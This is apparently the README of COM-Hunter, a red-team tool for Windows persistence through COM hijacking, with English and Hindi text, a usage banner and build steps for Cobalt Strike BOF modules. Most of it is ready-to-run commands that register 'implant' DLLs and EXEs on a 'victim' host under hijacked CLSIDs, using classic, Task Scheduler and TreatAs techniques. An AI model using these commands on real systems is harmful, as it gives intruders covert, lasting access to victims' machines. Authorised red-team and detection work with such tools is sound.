
Windows COM hijacking persistence tool with search, classic, Task Scheduler, and TreatAs modes. Available as .NET executable and Cobalt Strike BOF for red team operations. विंडोज COM अपहरण स्थायित्व उपकरण जिसमें खोज, क्लासिक, टास्क शेड्यूलर और TreatAs मोड शामिल हैं। .NET निष्पादन योग्य और रेड टीम संचालन के लिए Cobalt Strike BOF के रूप में उपलब्ध।
COM अपहरण VOODOO

COM-Hunter एक COM अपहरण स्थिरता (persistence) उपकरण है।
यह .NET संस्करण और Cobalt Strike के साथ पूर्णतः संगत BOF वेरिएंट दोनों में उपलब्ध है।
निम्नलिखित सूची उपलब्ध मोडों की व्याख्या करती है:
LocalServer32, InprocServer32 और HKLM व HKCU दोनों के अंतर्गत रजिस्ट्री प्रविष्टियों के आधार पर CLSID खोजता है।LocalServer32 या InprocServer32 का उपयोग करके क्लासिक COM अपहरण स्थिरता करता है।LocalServer32 या InprocServer32 का उपयोग करके स्वचालित रूप से COM अपहरण स्थिरता स्थापित करता है।LocalServer32 या InprocServer32 का उपयोग करके COM अपहरण स्थिरता करता है।HKLM और HKCU दोनों के अंतर्गत LocalServer32, और संबंधित रजिस्ट्री प्रविष्टियों पर निर्भर स्थिरता तंत्रों को हटाता है।ℹ️ इस उपकरण का चयन किया गया है और यह गर्व से Cobalt Strike Community Kit का हिस्सा है।
यदि आपको कोई बग मिलता है, तो कृपया उन्हें रिपोर्ट करने में संकोच न करें। आपकी प्रतिक्रिया इस परियोजना की गुणवत्ता सुधारने में मूल्यवान है!
इस परियोजना के लेखक और योगदानकर्ता उपकरण के किसी भी अवैध उपयोग के लिए उत्तरदायी नहीं हैं। यह केवल शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ता कानूनी उपयोग सुनिश्चित करने के लिए जिम्मेदार हैं।
यह परियोजना ❤️ से @nickvourd और @S1ckB0y1337 द्वारा बनाई गई है।
मेरे मित्र Marios Gyftos का विशेष धन्यवाद, जिन्होंने इस उपकरण के बीटा परीक्षण चरण के दौरान अमूल्य सहायता प्रदान की।
@zeropointsecltd के RTO पाठ्यक्रम से प्रेरित।
BOF कार्यान्वयन Lefteris Panos और उनकी शानदार परियोजना RegPersist से प्रेरित है।
base.c और bofdefs.h फ़ाइलें TrustedSec के CS-Situational-Awareness-BOF परियोजना से सीधी प्रतियाँ हैं।
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ HKLM और HKCU में DLL और EXE कार्यान्वयन खोजें:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ HKLM और HKCU में EXE कार्यान्वयन खोजें:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ HKLM में उन्नत EXE कार्यान्वयन खोजें:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ HKCU में EXE और DLL कार्यान्वयन खोजें:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ DLL कार्यान्वयन का उपयोग करके क्लासिक स्थिरता करें:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ EXE कार्यान्वयन का उपयोग करके क्लासिक स्थिरता करें:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ DLL कार्यान्वयन का उपयोग करके कार्य अनुसूचक के माध्यम से स्थिरता करें:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ TreatAs रजिस्ट्री कुंजी और नकली (अग्रेषण योग्य) CLSID का उपयोग करके DLL कार्यान्वयन के माध्यम से स्थिरता करें:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ HKCU में DLL कार्यान्वयन स्थिरता हटाएं:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ आवश्यक MinGW-w64 टूलचेन (x86_64-w64-mingw32-gcc और i686-w64-mingw32-gcc)
ℹ️ दोनों आर्किटेक्चर के लिए BOF ऑब्जेक्ट संकलित करें:
./make_all.sh
यह निम्नलिखित करेगा:
com_hunter_* निर्देशिकाएँ बनाएगा।com_hunter_*.x64.o और com_hunter_*.x86.o संकलित करेगा।com_hunter_*/ निर्देशिकाओं में ले जाएगा।ℹ️ BOF मॉड्यूल संकलित करने के बाद, Cobalt Strike में com_hunter_bof.cna लोड करें।
ℹ️ निर्माण आर्टिफैक्ट्स को साफ करने के लिए, प्रत्येक src निर्देशिका में जाएं और निष्पादित करें:
make clean
InprocServer32